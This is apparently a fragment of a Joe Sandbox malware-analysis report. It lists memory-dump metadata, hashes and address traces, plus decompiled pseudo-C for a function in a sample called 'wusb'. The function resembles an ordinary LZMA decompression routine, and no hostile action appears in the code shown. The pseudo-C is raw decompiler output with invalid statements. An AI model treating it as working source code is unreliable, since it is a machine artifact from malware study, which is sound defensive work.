                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                        • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                        • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                        • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E004067A7(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071F9))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                        0x004067b7
                                                        0x004067be
                                                        0x004067c4
                                                        0x004067ca
                                                        0x00000000
                                                        0x004067ce
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f0
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406805
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406850
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406855
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686d
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c4
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068c9
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e6
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
